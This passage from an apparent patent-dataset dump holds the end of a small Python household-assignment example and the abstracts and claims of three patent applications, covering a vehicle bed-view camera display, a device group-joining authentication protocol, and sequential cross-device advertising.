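                (r for r in rhus
                 if r["attr1"] == hh["attr1"]
                 and len(assignments[r["id"]]) < r["quota"]),
                None,
            )
        if target is not None:
            assignments[target["id"]].append(hh["id"])
    return assignments

rhus = [{"id": "R1", "attr1": "low-income", "attr2": "age-35-54", "quota": 2}]
panelists = [
    {"id": "P1", "attr1": "low-income", "attr2": "age-35-54"},  # exact match
    {"id": "P2", "attr1": "low-income", "attr2": "age-18-34"},  # fallback match
]
print(assign_households(rhus, panelists))  # {'R1': ['P1', 'P2']}
```

Here P1 lands in R1 via the two-attribute match and P2 via the first-attribute fallback, mirroring the first and second panelist households of claim 1.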
9,197 | 9,197 | 16,256,057 | 2,486 | A system for monitoring a bed of a vehicle is provided. The system includes a display, an input device, a first imaging device configured to capture one or more images of a bed of the vehicle, and a controller. The controller receives a first signal indicating a first activation of the input device, determines whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal, and instructs the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle speed is greater than the threshold and in response to the receipt of the first signal. | 1. A vehicle comprising:
a display; an input device; a first imaging device configured to capture one or more images of a bed of the vehicle; and a controller configured to
receive a first signal indicating a first activation of the input device;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 2. The vehicle of claim 1, wherein the controller is further configured to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 3. The vehicle of claim 2, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 4. The vehicle of claim 1, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 5. The vehicle of claim 1, wherein the controller is further configured to:
instruct the display to display the image of the bed for a time longer than the first predetermined time in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 6. The vehicle of claim 1, wherein the controller is further configured to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 7. The vehicle of claim 6, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 8. The vehicle of claim 1, wherein the controller is further configured to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and in response to a receipt of the second signal. 9. The vehicle of claim 8, wherein the controller is further configured to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 10. A system for monitoring a bed view of a vehicle, the system comprising:
one or more processors; one or more memory modules; and machine readable instructions stored in the one or more memory modules that, when executed by the one or more processors, cause the system to:
receive a first signal indicating a first activation of an input device of the vehicle;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct a display of the vehicle to display an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 11. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 12. The system of claim 11, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 13. The system of claim 10, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 14. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 15. The system of claim 14, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 16. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and in response to a receipt of the second signal. 17. The system of claim 16, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 18. A method for monitoring a bed view of a vehicle, the method comprising:
receiving a first signal indicating a first activation of an input device of the vehicle; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the first signal; determining whether the vehicle is moving forward; and displaying, on a display of the vehicle, an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 19. The method of claim 18, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 20. The method of claim 18, comprising:
receiving a second signal indicating a second activation of the input device after receiving the first signal; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determining whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and displaying the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and in response to a receipt of the second signal. | A system for monitoring a bed of a vehicle is provided. The system includes a display, an input device, a first imaging device configured to capture one or more images of a bed of the vehicle, and a controller. The controller receives a first signal indicating a first activation of the input device, determines whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal, and instructs the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle speed is greater than the threshold and in response to the receipt of the first signal. 1. A vehicle comprising:
a display; an input device; a first imaging device configured to capture one or more images of a bed of the vehicle; and a controller configured to
receive a first signal indicating a first activation of the input device;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct the display to display an image of the bed captured by the first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 2. The vehicle of claim 1, wherein the controller is further configured to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 3. The vehicle of claim 2, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 4. The vehicle of claim 1, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 5. The vehicle of claim 1, wherein the controller is further configured to:
instruct the display to display the image of the bed for a time longer than the first predetermined time in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 6. The vehicle of claim 1, wherein the controller is further configured to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 7. The vehicle of claim 6, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 8. The vehicle of claim 1, wherein the controller is further configured to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and in response to a receipt of the second signal. 9. The vehicle of claim 8, wherein the controller is further configured to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 10. A system for monitoring a bed view of a vehicle, the system comprising:
one or more processors; one or more memory modules; and machine readable instructions stored in the one or more memory modules that, when executed by the one or more processors, cause the system to:
receive a first signal indicating a first activation of an input device of the vehicle;
determine whether a speed of the vehicle is greater than a threshold in response to a receipt of the first signal;
determine whether the vehicle is moving forward; and
instruct a display of the vehicle to display an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 11. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display content displayed prior to the image of the bed after the image of the bed is displayed for the first predetermined time. 12. The system of claim 11, wherein the content is one of a navigational map, an audio system interface, an image, or a video. 13. The system of claim 10, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 14. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
instruct the display to display an image captured by a second imaging device in response to determining that the speed of the vehicle is less than the threshold and in response to receipt of the first signal. 15. The system of claim 14, wherein the image captured by the second imaging device is an image of a rear view of the vehicle. 16. The system of claim 10, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
receive a second signal indicating a second activation of the input device after receiving the first signal; determine whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determine whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and instruct the display to display the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and in response to a receipt of the second signal. 17. The system of claim 16, wherein the machine readable instructions stored in the one or more memory modules, when executed by the one or more processors, cause the system to:
continue displaying a current display without changing to a zoomed bed view in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is less than the second predetermined time, and in response to the receipt of the second signal. 18. A method for monitoring a bed view of a vehicle, the method comprising:
receiving a first signal indicating a first activation of an input device of the vehicle; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the first signal; determining whether the vehicle is moving forward; and displaying, on a display of the vehicle, an image of the bed captured by a first imaging device for a first predetermined time in response to determining that the vehicle is moving forward and that the speed of the vehicle is greater than the threshold and in response to the receipt of the first signal. 19. The method of claim 18, wherein:
the image of the bed is a zoomed bed view image, and a top boundary of the zoomed bed view image substantially overlaps with a top of a tailgate of the vehicle in the zoomed bed view image. 20. The method of claim 18, comprising:
receiving a second signal indicating a second activation of the input device after receiving the first signal; determining whether a speed of the vehicle is greater than a threshold in response to receipt of the second signal; determining whether a time period between a time of the first activation of the input device and a time of the second activation of the input device is greater than a second predetermined time; and displaying the zoomed bed view of the vehicle for the first predetermined time in response to determining that the speed of the vehicle is greater than the threshold, determining that the time period is greater than the second predetermined time, and in response to a receipt of the second signal. | 2,400 |
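The press-handling sequence in the vehicle claims above (show the bed-camera image for a fixed duration only when the vehicle is moving forward above a speed threshold, show the rear-view image otherwise, and ignore a second press that arrives within a minimum interval) can be sketched as one decision function. A minimal Python illustration; the threshold, durations, and return-value names are assumptions for the example, not taken from the application.

```python
# Hypothetical sketch of the display decision in the claims: a timed
# bed view above a forward-speed threshold, a rear-view fallback below
# it, and debouncing of a rapid second button press.

SPEED_THRESHOLD_KPH = 10      # illustrative values, not from the patent
DISPLAY_SECONDS = 5           # the "first predetermined time"
MIN_PRESS_INTERVAL_S = 2      # the "second predetermined time"

def on_button_press(speed_kph, moving_forward, now_s, last_press_s=None):
    """Return the display action for a bed-view button press."""
    if last_press_s is not None and now_s - last_press_s < MIN_PRESS_INTERVAL_S:
        return "keep-current-display"          # debounce the second press
    if moving_forward and speed_kph > SPEED_THRESHOLD_KPH:
        return f"show-bed-view-for-{DISPLAY_SECONDS}s"
    return "show-rear-view"                    # second imaging device fallback

print(on_button_press(60, True, now_s=100.0))                      # timed bed view
print(on_button_press(60, True, now_s=100.5, last_press_s=100.0))  # debounced
print(on_button_press(5, True, now_s=100.0))                       # rear view
```

After the timed bed view expires, the claims have the display return to whatever content was shown before; that restore step is left out of this sketch.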
9,198 | 9,198 | 16,293,541 | 2,434 | Some embodiments provide a method for a first device to join a group of related devices. The method receives input of a password for an account with a centralized entity and a code generated by a second device in the group. When the second device determines that the code input on the first device matches the generated code, the method receives an authentication code from the second device for authorizing the first device with the entity as a valid device for the account. The method uses the password and information regarding the first device to generate an application to the group. After sending the application to the second device, the method receives information from the second device that enables the first device to add itself to the group. The second device verifies the generated application, and the method uses the information received from the second device to join the group. | 1-20. (canceled) 21. A method comprising:
displaying, by a first device, a first code for entry on a second device of a group of related devices; receiving, by the first device and from the second device, a second code, the second code being received responsive to the first code being input on the second device; using, by the first device, the second code to authorize the first device as a valid device for a particular account with a centralized entity; transmitting, by the first device and to the second device, a message associated with joining the group of related devices; receiving, from the second device, the message signed with a private key corresponding to the particular account; and using, by the first device, the message to join the group of related devices. 22. The method of claim 21, further comprising:
prior to using the message to join the group of related devices, signing the message with a private key of the first device. 23. The method of claim 22, wherein the message comprises an application to join the group of related devices and using the message to join the group of related devices comprises:
transmitting, by the first device, the message to the second device. 24. The method of claim 21, wherein the second device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 25. The method of claim 21, wherein the message comprises an identifier of the first device. 26. The method of claim 21, further comprising:
transmitting, by the first device and to the second device, a request to join the group of related devices that comprises the second device. 27. The method of claim 21, wherein the centralized entity is a cloud services provider and the particular account comprises a cloud services account with the cloud services provider. 28. The method of claim 21, wherein the first code is randomly generated by the first device in a manner not reproducible by the centralized entity. 29. The method of claim 21, wherein the second code is generated in a manner reproducible by the centralized entity. 30. A non-transitory machine-readable medium comprising code that, when executed by one or more processors, causes the one or more processors to perform operations, the code comprising:
code to receive, by a first device of a group of related devices, input of a first code generated by a second device that is not established in the group of related devices; code to, responsive to the input, transmit, by the first device, a second code to the second device for authorization with a centralized entity for a particular user account; code to receive, by the first device and from the second device, a message associated with joining the group of related devices, the message being signed with a private key corresponding to the particular user account; and code to establish, by the first device, the second device in the group of related devices. 31. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to, prior to receiving, by the first device, the message signed with the private key corresponding to the particular user account:
receive, by the first device and from the second device, the message associated with joining the group of related devices, the message not being signed with the private key corresponding to the particular user account;
sign, by the first device, the message with a private key corresponding to the particular user account; and
transmit, by the first device, the signed message to the second device. 32. The non-transitory machine-readable medium of claim 30, wherein the first device is previously authorized with the centralized entity as another valid device for the particular user account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 33. The non-transitory machine-readable medium of claim 30, wherein the message comprises an identifier of the second device. 34. The non-transitory machine-readable medium of claim 30, wherein the centralized entity is a cloud services provider and the particular user account comprises a cloud services account with the cloud services provider. 35. The non-transitory machine-readable medium of claim 30, wherein the first code is randomly generated by the second device in a manner not reproducible by the centralized entity. 36. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to generate, by the first device, the second code in a manner reproducible by the centralized entity. 37. A device comprising:
a memory; and at least one processor configured to:
display a first code for entry on another device of a group of related devices;
receive, from the other device, a second code, the second code being received responsive to the first code being input on the other device;
use the second code to authorize the device as a valid device for a particular account with a centralized entity;
transmit, to the other device, a message associated with joining the group of related devices;
receive, from the other device, the message signed with a private key corresponding to the particular account; and
use the message to join the group of related devices. 38. The device of claim 37, wherein the at least one processor is further configured to:
prior to using the message to join the group of related devices, sign the message with a private key of the device. 39. The device of claim 38, wherein the message comprises an application to join the group of related devices and the at least one processor is configured to use the message to join the group of related devices by:
transmitting the message to the other device. 40. The device of claim 37, wherein the other device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the other device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. | Some embodiments provide a method for a first device to join a group of related devices. The method receives input of a password for an account with a centralized entity and a code generated by a second device in the group. When the second device determines that the code input on the first device matches the generated code, the method receives an authentication code from the second device for authorizing the first device with the entity as a valid device for the account. The method uses the password and information regarding the first device to generate an application to the group. After sending the application to the second device, the method receives information from the second device that enables the first device to add itself to the group. The second device verifies the generated application, and the method uses the information received from the second device to join the group.1-20. (canceled) 21. A method comprising:
displaying, by a first device, a first code for entry on a second device of a group of related devices; receiving, by the first device and from the second device, a second code, the second code being received responsive to the first code being input on the second device; using, by the first device, the second code to authorize the first device as a valid device for a particular account with a centralized entity; transmitting, by the first device and to the second device, a message associated with joining the group of related devices; receiving, from the second device, the message signed with a private key corresponding to the particular account; and using, by the first device, the message to join the group of related devices. 22. The method of claim 21, further comprising:
prior to using the message to join the group of related devices, signing the message with a private key of the first device. 23. The method of claim 22, wherein the message comprises an application to join the group of related devices and using the message to join the group of related devices comprises:
transmitting, by the first device, the message to the second device. 24. The method of claim 21, wherein the second device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 25. The method of claim 21, wherein the message comprises an identifier of the first device. 26. The method of claim 21, further comprising:
transmitting, by the first device and to the second device, a request to join the group of related devices that comprises the second device. 27. The method of claim 21, wherein the centralized entity is a cloud services provider and the particular account comprises a cloud services account with the cloud services provider. 28. The method of claim 21, wherein the first code is randomly generated by the first device in a manner not reproducible by the centralized entity. 29. The method of claim 21, wherein the second code is generated in a manner reproducible by the centralized entity. 30. A non-transitory machine-readable medium comprising code that, when executed by one or more processors, causes the one or more processors to perform operations, the code comprising:
code to receive, by a first device of a group of related devices, input of a first code generated by a second device that is not established in the group of related devices; code to, responsive to the input, transmit, by the first device, a second code to the second device for authorization with a centralized entity for a particular user account; code to receive, by the first device and from the second device, a message associated with joining the group of related devices, the message being signed with a private key corresponding to the particular user account; and code to establish, by the first device, the second device in the group of related devices. 31. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to, prior to receiving, by the first device, the message signed with the private key corresponding to the particular user account:
receive, by the first device and from the second device, the message associated with joining the group of related devices, the message not being signed with the private key corresponding to the particular user account;
sign, by the first device, the message with a private key corresponding to the particular user account; and
transmit, by the first device, the signed message to the second device. 32. The non-transitory machine-readable medium of claim 30, wherein the first device is previously authorized with the centralized entity as another valid device for the particular user account with the centralized entity, the second device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. 33. The non-transitory machine-readable medium of claim 30, wherein the message comprises an identifier of the second device. 34. The non-transitory machine-readable medium of claim 30, wherein the centralized entity is a cloud services provider and the particular user account comprises a cloud services account with the cloud services provider. 35. The non-transitory machine-readable medium of claim 30, wherein the first code is randomly generated by the second device in a manner not reproducible by the centralized entity. 36. The non-transitory machine-readable medium of claim 30, wherein the code further comprises:
code to generate, by the first device, the second code in a manner reproducible by the centralized entity. 37. A device comprising:
a memory; and at least one processor configured to:
display a first code for entry on another device of a group of related devices;
receive, from the other device, a second code, the second code being received responsive to the first code being input on the other device;
use the second code to authorize the device as a valid device for a particular account with a centralized entity;
transmit, to the other device, a message associated with joining the group of related devices;
receive, from the other device, the message signed with a private key corresponding to the particular account; and
use the message to join the group of related devices. 38. The device of claim 37, wherein the at least one processor is further configured to:
prior to using the message to join the group of related devices, sign the message with a private key of the device. 39. The device of claim 38, wherein the message comprises an application to join the group of related devices and the at least one processor is configured to use the message to join the group of related devices by:
transmitting the message to the other device. 40. The device of claim 37, wherein the other device is previously authorized with the centralized entity as another valid device for the particular account with the centralized entity, the other device is separate from the centralized entity, and the group of related devices is exclusive of the centralized entity. | 2,400 |
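Claims 21-40 above describe a device-pairing flow: the joining device displays a first code, the user enters it on an established device, a second code comes back to authorize the joining device with the account, and a join message signed with a key tied to the account finally admits it to the group. The sketch below models that exchange under loud assumptions: HMAC over a shared per-account secret stands in for the asymmetric private-key signature the claims describe, and every function name and the key scheme are illustrative, not from the patent.

```python
# Illustrative sketch of the group-join protocol in claims 21-40. HMAC is a
# stand-in for the account private-key signature; all names are assumptions.
import hashlib
import hmac
import secrets
from typing import Optional

ACCOUNT_KEY = b"per-account secret held by authorized devices"  # assumed

def display_code() -> str:
    # Joining device: random first code, not reproducible by the
    # centralized entity (claim 28).
    return f"{secrets.randbelow(10**6):06d}"

def respond_with_second_code(entered: str, shown: str) -> Optional[str]:
    # Established device: answer only if the user typed the right code.
    if not hmac.compare_digest(entered, shown):
        return None
    # Second code derived deterministically (claim 29's "reproducible" code).
    return hashlib.sha256(shown.encode()).hexdigest()[:12]

def sign_join_message(message: bytes) -> bytes:
    # Established device signs the join message with the account key.
    return hmac.new(ACCOUNT_KEY, message, hashlib.sha256).digest()

def verify_and_join(message: bytes, signature: bytes) -> bool:
    # Joining device accepts group membership only if the signature checks out.
    return hmac.compare_digest(sign_join_message(message), signature)

code = display_code()
second = respond_with_second_code(code, code)
msg = b"join-request:device-1"
assert second is not None and verify_and_join(msg, sign_join_message(msg))
```

In the claims the joining device may also countersign with its own key (claim 22) and the signed message doubles as the "application" sent back to the group; those steps are straightforward extensions of `sign_join_message` and are omitted here.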
9,199 | 9,199 | 15,985,639 | 2,424 | The technology relates to sequential or tailored delivery of advertising content across a plurality of media conduits. The invention achieves sequential story telling for advertising campaigns in place of single-series advertising, by delivering over a period of several sessions on a variety of devices. An advertiser can air a campaign on a consumer individual's cell phone device, continue the second portion of the campaign via a desktop browser session, and conclude with the third portion of the campaign on the individual's OTT device. The technology provides advanced controls over targeting and scheduling with high precision. | 1. A method for delivering advertising content sequentially to a consumer across two or more display devices, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of two or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the two or more TV and mobile devices used by each consumer, demographic and online behavioral data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more slots for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV. 2. The method of claim 1, further comprising:
obtaining a second datum from the second performance tag for the second item of advertising content; and, optionally, instructing a third content provider to deliver an additional item of advertising content to an additional slot accessible to the consumer on a third device, based on the second datum, wherein the third device is optionally the same as either the first device or the second device. 3. The method of claim 1, wherein the first item of advertising content and the second item of advertising content are sequential parts of a narrative. 4. The method of claim 1, wherein the first datum comprises a confirmation whether the consumer has seen the first item of advertising content, and the second item of advertising content is not delivered to the consumer until the consumer has seen the first item of advertising content. 5. The method of claim 1, wherein the pool of consumers comprises a first group of consumers having a first threshold similarity to a member of the target audience, and a second group of consumers having a second threshold similarity to a member of the target audience, and wherein the first item of advertising content is present in two versions, and the first version is delivered to a first slot of inventory accessible to the first group of consumers and a second version is delivered to a second slot of inventory accessible to the second group of consumers. 6. The method of claim 1, wherein the first datum comprises an indication of whether the consumer has skipped or declined to view the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has skipped or declined to view the first item of advertising content. 7. 
The method of claim 1, wherein the first datum comprises an indication of whether the consumer has purchased a product featured in the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has purchased the product. 8. The method of claim 1, wherein the first slot is on a TV, and the second slot is on a mobile device. 9. The method of claim 8, wherein a second performance tag for the second item of advertising content includes a gross rating point, and wherein if the gross rating point is below a target number, one or more of the first and second items of advertising content, or a third item of advertising content, is delivered to a third slot of inventory accessible to the consumer on a TV. 10. A method for optimizing an advertising campaign, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of one or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors selected from: age range, gender, and location; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the devices used by each consumer, demographic data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more segments for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets based on the inventory; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV;
receiving a second datum from the second performance tag to validate whether a particular consumer viewed the second item of advertising content on the second device; and
applying a machine learning technique to the first and second performance tags, in order to improve the allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets. 11. A method of controlling sequential delivery of cross-screen advertising content to a consumer, the method comprising:
determining that the consumer is a member of a target audience; identifying a first and second device accessible to the consumer; receiving instructions for placement of a first and second item of advertising content on the first and second device, consistent with an advertising budget and the target audience; causing a first media conduit to deliver the first item of advertising content to the first device; and when the first item of advertising content has been viewed by the consumer, causing a second media conduit to deliver the second item of advertising content to the second device, wherein the first and second device comprise a TV and a mobile device. | The technology relates to sequential or tailored delivery of advertising content across a plurality of media conduits. The invention achieves sequential story telling for advertising campaigns in place of single-series advertising, by delivering over a period of several sessions on a variety of devices. An advertiser can air a campaign on a consumer individual's cell phone device, continue the second portion of the campaign via a desktop browser session, and conclude with the third portion of the campaign on the individual's OTT device. The technology provides advanced controls over targeting and scheduling with high precision.1. A method for delivering advertising content sequentially to a consumer across two or more display devices, the method comprising:
receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of two or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the two or more TV and mobile devices used by each consumer, demographic and online behavioral data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more slots for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV. 2. The method of claim 1, further comprising:
obtaining a second datum from the second performance tag for the second item of advertising content; and, optionally, instructing a third content provider to deliver an additional item of advertising content to an additional slot accessible to the consumer on a third device, based on the second datum, wherein the third device is optionally the same as either the first device or the second device. 3. The method of claim 1, wherein the first item of advertising content and the second item of advertising content are sequential parts of a narrative. 4. The method of claim 1, wherein the first datum comprises a confirmation whether the consumer has seen the first item of advertising content, and the second item of advertising content is not delivered to the consumer until the consumer has seen the first item of advertising content. 5. The method of claim 1, wherein the pool of consumers comprises a first group of consumers having a first threshold similarity to a member of the target audience, and a second group of consumers having a second threshold similarity to a member of the target audience, and wherein the first item of advertising content is present in two versions, and the first version is delivered to a first slot of inventory accessible to the first group of consumers and a second version is delivered to a second slot of inventory accessible to the second group of consumers. 6. The method of claim 1, wherein the first datum comprises an indication of whether the consumer has skipped or declined to view the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has skipped or declined to view the first item of advertising content. 7. 
The method of claim 1, wherein the first datum comprises an indication of whether the consumer has purchased a product featured in the first item of advertising content, and the second item of advertising content is not delivered to the consumer if the consumer has purchased the product. 8. The method of claim 1, wherein the first slot is on a TV, and the second slot is on a mobile device. 9. The method of claim 8, wherein a second performance tag for the second item of advertising content includes a gross rating point, and wherein if the gross rating point is below a target number, one or more of the first and second items of advertising content, or a third item of advertising content, is delivered to a third slot of inventory accessible to the consumer on a TV. 10. A method for optimizing an advertising campaign, the method comprising:
